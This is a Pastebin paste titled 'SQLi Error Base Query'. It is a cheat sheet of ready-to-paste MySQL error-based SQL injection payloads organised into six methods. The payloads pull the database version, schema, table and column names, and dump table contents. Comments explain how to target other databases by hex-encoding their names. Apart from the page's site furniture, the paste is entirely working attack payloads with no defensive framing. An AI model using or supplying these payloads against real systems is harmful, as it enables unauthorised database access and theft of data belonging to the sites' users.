API tools faq
paste
Advertisement
moemyintshein

SQLi Error Base Query

moemyintshein
Mar 14th, 2017
118
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.36 KB | None | 0 0
raw download clone embed print report
  1. #Double Query , Method 1
  2. -------------------------
  3.  
  4. #Version Query
  5.  
  6. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(version()​+as+char),0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+fr​om+information_schema.tables+group+by+x)a)
  7.  
  8.  
  9. #Table Query
  10.  
  11. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam​e+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+l​imit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  12.  
  13. /*You can change the table schema to get the tables out of your specified database by converting your DB name to hex and using the following query.*/
  14.  
  15. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam​e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE​X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  16.  
  17. /*Getting The Database Names*/
  18.  
  19. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(schema_na​me+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))​x+from+information_schema.tables+group+by+x)a)
  20.  
  21. #Columns
  22.  
  23. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_na​me+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLEHEX+l​imit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  24.  
  25. #Data
  26.  
  27. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(CO​LUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x​+from+information_schema.tables+group+by+x)a)
  28.  
  29. /*To get data out of a different database, use this query.*/
  30.  
  31. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(CO​LUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+DATABASENAME.TABLENAME+limit+0,1),floor​(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  32.  
  33. ====================================================================================================================================
  34.  
  35. #Double Query Method 2 (#Standard Error-Based)
  36. ----------------------------------------------
  37.  
  38. #Vesion
  39.  
  40. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
  41.  
  42. #Tables
  43.  
  44. +or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+​where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
  45.  
  46. /*The same rules apply, you can get the tables out of a different database by changing the schema.*/
  47.  
  48. +or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+​where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1​--
  49.  
  50. #Columns
  51.  
  52. +or+1+group+by+concat_ws(0x7e,(select+column_name+from+information_schema.column​s+where+table_name=0xTABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
  53.  
  54. #Data Dump
  55.  
  56. +or+1+group+by+concat_ws(0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAM​E+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
  57.  
  58. ======================================================================================================================================
  59.  
  60. #Double Query Method 3 (UNION ERROR BASE)
  61. ------------------------------------------
  62.  
  63. #Tables
  64.  
  65. +and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+b​y+concat((select+table_name+from+information_schema.tables+where+table_schema=da​tabase()+limit+0,1),floor(rand(0)*2)))--
  66.  
  67. #Columns
  68.  
  69. +and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+b​y+concat((select+column_name+from+information_schema.columns+where+table_name=0x​TABLEHEX+limit+0,1),floor(rand(0)*2)))--
  70.  
  71. #Data Dump
  72.  
  73. +and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+b​y+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(ra​nd(0)*2)))--
  74.  
  75. ==============================================================================================================================
  76.  
  77. #Error Base Method 4
  78. ---------------------
  79.  
  80. #Tables
  81.  
  82. parameter[]=(@:=1)||@+group+by+concat((select+table_name+from+information_schema.tables+whe​re+table_schema=database()+limit+0,1),0x7e,!@)+having+@||min(@:=0)--
  83.  
  84. #Columns
  85.  
  86. parameter[]=(@:=1)||@+group+by+concat((select+column_name+from+information_schema.columns+w​here+table_name=0xTABLEHEX+limit+0,1),0x7e,!@)+having+@||min(@:=0)--
  87.  
  88. #Data Dump
  89.  
  90. parameter[]=(@:=1)||@+group+by+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+l​imit+0,1),0x7e,!@)+having+@||min(@:=0)--
  91.  
  92. =====================================================================================================================================
  93.  
  94. #Error Base Method 5
  95. ---------------------
  96.  
  97. #Tables
  98.  
  99. +and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+table_​name+from+information_schema.tables+where+table_schema=database()+limit+0,1))x+f​rom+information_schema.tables+group+by+x)a)--
  100.  
  101. #Columns
  102.  
  103. +and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+column​_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1))x+f​rom+information_schema.tables+group+by+x)a)--
  104.  
  105. #Data Dump
  106.  
  107. +and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+concat​(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1))x+from+information_schema.table​s+group+by+x)a)--
  108.  
  109. ======================================================================================================================================
  110.  
  111. #Error Base Method 6
  112. ---------------------
  113.  
  114. #Tables
  115.  
  116. +and+row(1,1)>(select+count(*),concat((select+table_name+from+information_schema.tables+whe​re+table_schema=database()+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+uni​on+select+null+union+select+!1)x group+by+x+limit+0,1)--
  117.  
  118. #Columns
  119.  
  120. +and+row(1,1)>(select+count(*),concat((select+column_name+from+information_schema.columnes+​where+table_name=0xTABLEHEX+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+un​ion+select+null+union+select+!1)x group+by+x+limit+0,1)--
  121.  
  122. #Data Dump
  123.  
  124. +and+row(1,1)>(select+count(*),concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+l​imit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+​!1)x group+by+x+limit+0,1)--
  125.  
  126. ====================================================================================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!